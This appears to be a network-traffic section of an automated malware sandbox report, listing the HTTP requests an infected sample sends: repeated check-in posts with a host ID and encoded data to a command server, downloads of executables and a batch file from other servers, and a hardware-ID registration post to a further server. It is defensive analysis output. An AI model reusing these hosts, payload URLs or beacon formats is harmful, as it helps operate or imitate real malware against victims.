Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 35 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060350101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 36 30 31 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060360121&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.93.20.28Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 45.93.20.28Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 44 30 38 36 45 42 46 37 43 38 34 36 35 38 35 34 32 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 75 6d 70 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 2d 2d 0d 0a Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="hwid"73D086EBF7C8465854224------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="build"trump------IDAAFBGDBKJJJKFIIIJJ--
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Tue, 25 Feb 2025 19:05:24 GMTIf-None-Match: "54e00-62efc23970500"
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060370101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
